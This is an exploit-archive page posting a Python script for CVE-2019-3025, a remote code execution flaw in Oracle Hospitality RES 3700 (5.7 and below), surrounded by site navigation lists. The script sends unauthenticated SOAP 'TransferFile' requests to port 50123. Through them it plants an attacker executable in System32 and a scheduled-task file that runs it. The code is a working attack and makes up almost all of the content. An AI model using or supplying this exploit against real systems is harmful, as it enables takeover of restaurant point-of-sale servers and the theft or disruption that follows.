Oracle Hospitality RES 3700 5.7 Remote Code Execution

Oracle Hospitality RES 3700 5.7 Remote Code Execution: Posted May 18, 2020; Authored by Walid Faour; Oracle Hospitality RES 3700 versions 5.7 and below suffer from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2019-3025; SHA-256 | c70d722f24def5a0fc44bda1a9629e159191429aba952c8c7803c20b5f9ec1cf; Download | Favorite | View

Oracle Hospitality RES 3700 5.7 Remote Code Execution

# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution
# Date: 2019-10-01
# Exploit Author: Walid Faour
# Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/
# Software Link: N/A (Available to customers)
# Version: <= v5.7
# Tested on: Windows Server 2003 / Windows Server 2008
# CVE : CVE-2019-3025

#!/usr/bin/env python

#Author: Walid Faour
#Date: Aug. 2, 2019
#Oracle Hospitality RES 3700 Release 4.9 Exploit

import binascii
import requests

print
print '-------------------------------------------------'
print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit'
print '-------------------------------------------------'
print

IP = raw_input("Enter the IP address: ")
URL = "http://" + IP + ":50123"

f = open("attacker-4.9.exe",'rb')
raw_payload = f.read()
payload_hex = binascii.hexlify(raw_payload)
f.close()

g = open("attacker-4.9.job",'rb')
raw_task = g.read()
scheduled_task_hex = binascii.hexlify(raw_task)
g.close()

def exploit_body(data,full_path):
  body = '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> \
      <SOAP-ENV:Body xmlns:MCRS-ENV="MCRS-URI"> \
        <MCRS-ENV:Service>MDSSYSUTILS</MCRS-ENV:Service> \
        <MCRS-ENV:Method>TransferFile</MCRS-ENV:Method> \
        <MCRS-ENV:SessionKey>Session</MCRS-ENV:SessionKey> \
        <MCRS-ENV:InputParameters> \
          <dst>' + full_path + '</dst> \
          <fn>' + full_path + '</fn> \
          <data>' + data + '</data> \
        </MCRS-ENV:InputParameters> \
      </SOAP-ENV:Body> \
    </SOAP-ENV:Envelope>'
  return body
def exploit_headers(body):
  headers = {
    "Content-Type" : "text/xml",
    "User-Agent" : "MDS POS Client",
    "Host" : IP + ":50123",
    "Content-Length" : str(len(body)),
    "Connection" : "Keep-Alive"
  }
  return headers
print 'Exploiting Oracle Hospitality RES 3700 at IP address ' + IP + '...'
body_payload = exploit_body(payload_hex,"C:\\Windows\\System32\\attacker-4.9.exe")
body_task = exploit_body(scheduled_task_hex,"C:\\Windows\\Tasks\\attacker-4.9.job")
send_payload = requests.post(URL,data=body_payload,headers=exploit_headers(body_payload))
send_task = requests.post(URL,data=body_task,headers=exploit_headers(body_task))

Top Authors In Last 30 Days

Red Hat 223 files
Ubuntu 57 files
LiquidWorm 23 files
Debian 19 files
indoushka 15 files
Apple 9 files
Google Security Research 5 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Oracle Hospitality RES 3700 5.7 Remote Code Execution

Oracle Hospitality RES 3700 5.7 Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Oracle Hospitality RES 3700 5.7 Remote Code Execution

Share This

Oracle Hospitality RES 3700 5.7 Remote Code Execution

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems